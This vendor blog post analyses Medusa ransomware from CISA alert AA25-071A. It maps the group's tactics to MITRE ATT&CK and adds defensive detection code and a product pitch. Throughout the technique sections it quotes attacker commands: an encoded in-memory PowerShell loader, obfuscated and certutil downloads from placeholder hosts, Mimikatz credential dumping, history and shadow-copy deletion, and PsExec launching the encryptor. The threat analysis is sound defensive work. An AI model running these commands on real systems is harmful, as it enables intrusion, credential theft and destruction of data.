Huseyin Can YUCEEL | March 13, 2025 | 8 MIN READ

LAST UPDATED ON MARCH 14, 2025

Medusa Ransomware Analysis, Simulation, and Mitigation - CISA Alert AA25-071A

On March 12, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Medusa ransomware [1]. Medusa ransomware emerged as a Ransomware-as-a-Service operation in June 2021 and gained infamy by compromising over 300 victims across critical infrastructure sectors, including healthcare, insurance, technology, manufacturing, and legal.

In this blog post, we explain the Tactics, Techniques, and Procedures (TTPs) used by Medusa ransomware and how organizations can defend themselves against Medusa ransomware attacks.

Medusa Ransomware-as-a-Service Group

Medusa is a ransomware-as-a-service (RaaS) group that has been active since June 2021. Initially, Medusa operated as a closed ransomware variant controlled by a single group, but it later evolved into an affiliate-based model. Despite this shift, the core Medusa developers still retain control over important operations like ransom negotiations. Medusa threat actors employ a double extortion strategy, where they encrypt victim data and threaten to release it publicly unless the ransom is paid.

The group primarily targets organizations across critical infrastructure sectors, including healthcare, insurance, technology, manufacturing, and legal. Their victims range from large enterprises to smaller businesses, reflecting a broad and opportunistic targeting approach.

Medusa's motivations are primarily financial. Their ransom demands vary widely, with some victims required to pay millions of dollars to regain access to their data. They also engage in direct negotiation tactics, contacting victims via phone or email to increase pressure. Additionally, Medusa actors operate a data leak site where they auction stolen data to third parties before the ransom deadline expires. In some cases, victims who pay the ransom have been targeted again with further extortion attempts, suggesting that Medusa actors may engage in triple extortion tactics.

The group's modus operandi involves infiltrating a network, identifying valuable data, and deploying ransomware to encrypt files. Medusa affiliates gain initial access through multiple techniques, often relying on initial access brokers (IABs) who sell access to compromised networks. These brokers use phishing campaigns to steal credentials and exploit unpatched software vulnerabilities. Known exploits include vulnerabilities in remote access tools such as ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet EMS (CVE-2023-48788). Once inside, the attackers use living-off-the-land binaries (LOLBins) and legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner for network discovery and lateral movement. They rely on living-off-the-land (LOTL) techniques to evade detection, leveraging built-in Windows tools like PowerShell and Windows Management Instrumentation (WMI). They also attempt to disable security software using bring-your-own-vulnerable-driver (BYOVD) techniques. Exfiltrated data is stored on Medusa-controlled servers and used to pressure victims into paying the demanded ransom.

Medusa Ransomware Analysis and MITRE ATT&CK TTPs

Initial Access

T1190 Exploit Public Facing Applications

Medusa threat actors exploit unpatched software vulnerabilities to gain initial access to target environments. Organizations are advised to apply patches promptly to mitigate this risk.

Affected Product          | Vulnerability  | CVSS Score
--------------------------|----------------|----------------
ConnectWise ScreenConnect | CVE-2024-1709  | 10.0 (Critical)
Fortinet EMS              | CVE-2023-48788 | 9.8 (Critical)

T1566 Phishing

Medusa affiliates frequently use phishing campaigns to steal user credentials and gain access to target environments. These campaigns often involve deceptive emails with malicious attachments or links leading to credential-harvesting websites.

Execution

T1059.001 Command and Scripting Interpreter: PowerShell

Medusa threat actors use the PowerShell command given below to execute malicious scripts and establish persistence. The command decodes a base64-encoded, gzip-compressed payload and runs it in memory, avoiding both disk artifacts and signature-based detection.

powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('<base64_payload>'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
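A triage helper for the loader pattern above, added here as an example (not code from the Picus post or the CISA advisory): it recovers the script such a command would run in memory so an analyst can read it without executing it, and records the launch flags that make the invocation suspicious. The sample command line is constructed from a benign script.

```python
# Added example: decode the gzip+base64 PowerShell loader shape without running it.
import base64
import gzip
import re

# Launch flags seen in the advisory's command line and what they mean.
SUSPICIOUS_FLAGS = {
    "-nop": "NoProfile",
    "-w hidden": "WindowStyle Hidden",
    "-noni": "NonInteractive",
    "-ep bypass": "ExecutionPolicy Bypass",
}
B64_ARG = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")


def analyse_loader(cmdline: str) -> dict:
    """Return the suspicious flags present plus the decoded script (None if not gzip+base64)."""
    lower = cmdline.lower()
    flags = [name for flag, name in SUSPICIOUS_FLAGS.items() if flag in lower]
    decoded = None
    match = B64_ARG.search(cmdline)
    if match and "GzipStream" in cmdline:
        try:
            decoded = gzip.decompress(base64.b64decode(match.group(1))).decode("utf-8", "replace")
        except (ValueError, OSError):  # malformed base64 or not a gzip stream
            decoded = None
    return {"flags": flags, "decoded_script": decoded}


def build_sample(script: str) -> str:
    """Constructed sample: wrap a benign script in the exact loader shape quoted above."""
    blob = base64.b64encode(gzip.compress(script.encode())).decode()
    return (
        "powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((New-Object "
        "System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object "
        f"System.IO.MemoryStream(,[System.Convert]::FromBase64String('{blob}'))),"
        "[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
    )


if __name__ == "__main__":
    print(analyse_loader(build_sample("Write-Host 'constructed benign sample'")))
```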

T1059.003 Command and Scripting Interpreter: Windows Command Shell

Medusa threat actors utilize the Windows Command Shell (cmd.exe) to execute malicious commands, perform reconnaissance, disable security defenses, and deploy ransomware across victim networks.

cmd.exe /c net share
cmd.exe /c sc query
cmd.exe /c schtasks

T1047 Windows Management Instrumentation

Medusa actors abuse WMI to gather information about system processes, users, and network configurations. The commands below extract printer configurations and print jobs, which can be useful for identifying networked devices.

wmic printer get caption,name,deviceid,drivername,portname
wmic printjob

Persistence

T1136.002 Create Account

Medusa actors create new user accounts to maintain persistence. The command below creates a new user account with administrative privileges.

net user /add default <password> /domain 

Defense Evasion

T1070.003 Indicator Removal: Clear Command History

To avoid detection, Medusa actors delete traces of their activities by erasing PowerShell command line history. The command below deletes the PowerShell command history file, making forensic investigations more difficult.

powershell Remove-Item (Get-PSReadlineOption).HistorySavePath

T1027.013 Obfuscated Files or Information: Encrypted/Encoded File

Medusa actors obfuscate scripts and payloads to evade detection by security tools. They manipulate PowerShell and batch scripts to hide malicious commands. This technique splits and concatenates a command to bypass signature-based detection.

powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<malicious_file>.msi)
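The string-splitting trick above can be undone mechanically before matching. The helper below, added as an example (not code from the post or the advisory), folds every run of single-quoted literals joined with + back into one literal and then checks the result against method names a defender watches for; PowerShell member names are case-insensitive, so the comparison is too. The sample one-liner is constructed with a placeholder URL.

```python
# Added example: normalise 'D' + 'Own' + 'LOa' + ... concatenation before detection.
import re

WATCHED_MEMBERS = ("DownloadFile", "DownloadString", "DownloadData", "Invoke-Expression")
# One single-quoted literal followed by at least one "+ 'literal'" continuation.
CONCAT = re.compile(r"'([^']*)'(?:\s*\+\s*'([^']*)')+")


def fold_concatenations(cmdline: str) -> str:
    """Replace every run of 'a' + 'b' + 'c' with the single literal 'abc'."""
    def join(match: re.Match) -> str:
        pieces = re.findall(r"'([^']*)'", match.group(0))
        return "'" + "".join(pieces) + "'"
    return CONCAT.sub(join, cmdline)


def flag_members(cmdline: str) -> list:
    """Return the watched member names present once concatenation is undone."""
    folded = fold_concatenations(cmdline).lower()
    return [m for m in WATCHED_MEMBERS if m.lower() in folded]


# Constructed sample with the same shape as the advisory's one-liner (placeholder URL).
SAMPLE = ("powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; "
          "Invoke-Expression (New-Object Net.WebClient).$x.Invoke('http://<ip>/<file>.msi')")

if __name__ == "__main__":
    print(fold_concatenations(SAMPLE))
    print(flag_members(SAMPLE))
```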

T1562.001 Impair Defenses: Disable or Modify Tools

Medusa threat actors modify Windows Firewall rules to allow inbound RDP connections on TCP port 3389.

netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow

Discovery

T1046 Network Service Discovery & T1016 System Network Configuration Discovery

Medusa threat actors use legitimate administrative tools to identify active hosts, open ports, and services running on the victim's network. They also use network scanning tools like Advanced IP Scanner and SoftPerfect Network Scanner to map the internal network. The commands below list active connections and listening ports, and retrieve detailed network configuration, including IP addresses, gateway settings, and DNS servers.

netstat -a
ipconfig /all

T1135 Network Share Discovery

Medusa actors identify shared network drives to spread ransomware and steal data. The command below lists the network shares available on a system.

net share

T1082 System Information Discovery

Medusa actors collect system details such as OS version, installed software, and system architecture. The commands below gather detailed system, user, domain, and driver information used to tailor attacks.

systeminfo
echo Computer: %COMPUTERNAME%
echo Username: %USERNAME%
echo Domain: %USERDOMAIN%
echo Logon Server: %LOGONSERVER%
echo DNS Domain: %USERDNSDOMAIN%
echo User Profile: %USERPROFILE%
echo System Root: %SYSTEMROOT%
driverquery

T1069.002 Permission Groups Discovery: Domain Groups

Medusa actors enumerate Active Directory domain groups to identify privileged accounts. The command below lists members of the Domain Admins group, which can be targeted for privilege escalation.

net group "Domain Admins" /domain

Credential Access

T1003.001 OS Credential Dumping: LSASS Memory

Medusa affiliates use Mimikatz to dump credentials from the Local Security Authority Subsystem Service (LSASS), allowing them to escalate privileges and move laterally within the network. The command below extracts plaintext passwords and NTLM hashes from LSASS memory.

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

Lateral Movement

T1072 Software Deployment Tools

Medusa threat actors use software deployment tools like PDQ Deploy and BigFix to distribute ransomware across networks.

T1021.001 Remote Services: Remote Desktop Protocol

Medusa threat actors use compromised credentials to access systems via RDP, enabling them to move laterally within the victim's network.

mstsc.exe /v:{hostname/ip} /u:{user} /p:{password}

Exfiltration

T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Medusa threat actors use rclone to exfiltrate their victims' sensitive data to Medusa C2 servers.

Command and Control

T1071.001 Application Layer Protocol: Web Protocols

Medusa threat actors use HTTPS to communicate with command-and-control (C2) servers and exfiltrate data.

T1219 Remote Access Software

Medusa threat actors use legitimate remote access tools like AnyDesk to maintain control over compromised systems.

T1105 Ingress Tool Transfer

Medusa threat actors transfer malicious tools and payloads into victim environments to facilitate their operations, including credential dumping, remote access, and ransomware deployment. They often use certutil, PowerShell, and PsExec to download and execute tools while evading security controls.

certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dll
certutil -f urlcache https://<domain>/<remotefile>.msi <localfile>.msi

Impact

T1486 Data Encrypted for Impact

Medusa ransomware encrypts victim data using AES-256 encryption and appends the .medusa extension to affected files. The encryptor process, gaze.exe, is deployed to encrypt files and drop ransom notes.

psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "c:\gaze.exe"

T1490 Inhibit System Recovery

Medusa threat actors delete volume shadow copies to prevent recovery.

vssadmin delete shadows /all /quiet
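As an added example (not from the post or the advisory), the command lines quoted throughout this section turned into process-creation detection rules, each tagged with its ATT&CK ID so hits can be grouped by tactic; Impact-stage hits are singled out because those hosts need isolating first. The events and their host/cmdline field names are constructed assumptions, so map them to whatever your EDR or Sysmon pipeline emits.

```python
# Added example: match process-creation command lines against the Medusa TTPs above.
import re

# (ATT&CK ID, description, pattern over the full command line)
RULES = [
    ("T1059.001", "PowerShell hidden window with ExecutionPolicy Bypass",
     re.compile(r"powershell.*-w\s+hidden.*-ep\s+bypass", re.I)),
    ("T1070.003", "PSReadLine history file removed",
     re.compile(r"Remove-Item\s+\(Get-PSReadLineOption\)\.HistorySavePath", re.I)),
    ("T1562.001", "Inbound RDP allowed via netsh",
     re.compile(r"netsh\s+advfirewall.*dir=in.*localport=3389.*action=allow", re.I)),
    ("T1069.002", "Domain Admins group enumerated",
     re.compile(r'net\s+group\s+"Domain Admins"\s+/domain', re.I)),
    ("T1003.001", "Mimikatz LSASS credential dump",
     re.compile(r"sekurlsa::logonpasswords", re.I)),
    ("T1105", "certutil used as a downloader",
     re.compile(r"certutil.*urlcache", re.I)),
    ("T1486", "PsExec launching encryptor as SYSTEM",
     re.compile(r"psexec.*\s-s\s.*gaze\.exe", re.I)),
    ("T1490", "Shadow copies deleted",
     re.compile(r"vssadmin\s+delete\s+shadows\s+/all", re.I)),
]


def scan_events(events: list) -> list:
    """Return (host, attack_id, description) for every event matching a rule."""
    hits = []
    for ev in events:
        for attack_id, desc, pat in RULES:
            if pat.search(ev["cmdline"]):
                hits.append((ev["host"], attack_id, desc))
    return hits


def hosts_with_impact(hits: list) -> set:
    """Hosts where an Impact-stage technique (T1486/T1490) fired: isolate these first."""
    return {host for host, attack_id, _ in hits if attack_id in ("T1486", "T1490")}


# Constructed sample events shaped like Sysmon Event ID 1 after field extraction.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": 'cmd.exe /c netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow'},
    {"host": "ws01", "cmdline": "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath"},
    {"host": "fs02", "cmdline": "vssadmin delete shadows /all /quiet"},
    {"host": "fs02", "cmdline": 'psexec.exe -accepteula -nobanner -s \\\\fs02 cmd /c "c:\\gaze.exe"'},
    {"host": "ws03", "cmdline": "ipconfig /all"},  # benign admin noise, must not match
]

if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for hit in hits:
        print(hit)
    print("isolate first:", sorted(hosts_with_impact(hits)))
```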

How Picus Helps Simulate Medusa Ransomware Attacks

We also strongly suggest simulating Medusa ransomware attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as HellCat, Ghost, and Black Basta, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Medusa ransomware:

Threat ID | Threat Name                       | Attack Module
----------|-----------------------------------|------------------------------
31340     | Medusa Ransomware Campaign        | Windows Endpoint
72791     | Medusa Ransomware Download Threat | Network Infiltration
66692     | Medusa Ransomware Email Threat    | Email Infiltration (Phishing)

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Medusa ransomware and other ransomware attacks in preventive security controls. Picus Labs has validated the following signatures for Medusa ransomware:

Security Control | Signature ID | Signature Name
-----------------|--------------|------------------------------------------------------------------------
Check Point NGFW | 0920BA626    | Ransomware.Win32.Medusa.TC.5a8fkYQw
Check Point NGFW | 0F31EFFFA    | Ransomware.Win32.Medusa.TC.de3cwwcz
Check Point NGFW | 0B7282E76    | Trojan.Win32.Imps.TC.bfb4UCRQ
Check Point NGFW | 090BB1A2E    | Ransomware.Win32.Medusa.TC.b20eAyZa
Check Point NGFW | 0808FEF5A    | Ransomware.Win32.Medusa.TC.2d62ZwaZ
Cisco FirePower  | 1.49569.1    | MALWARE-OTHER PowerShell invocation with ExecutionPolicy Bypass attempt
Forcepoint NGFW  |              | File_Malware-Blocked
Fortigate AV     | 10126105     | W32/Filecoder.MEDU!tr.ransom
Fortigate AV     | 10127337     | W32/Filecoder_Medusa.A!tr.ransom
Palo Alto        | 624270429    | Ransom/Win32.medusa.h
Palo Alto        | 572533496    | ransomware/Win32.rents.u
Palo Alto        | 624270495    | Ransom/Win32.medusa.j
Palo Alto        | 609797718    | ransomware/Win32.medusa.g
Palo Alto        | 624270456    | Ransom/Win32.medusa.i
Trellix          | 0x4840c900   | MALWARE: Malicious File Detected by GTI
Snort            | 1.49569.1    | MALWARE-OTHER PowerShell invocation with ExecutionPolicy Bypass attempt

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] "#StopRansomware: Medusa Ransomware," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a
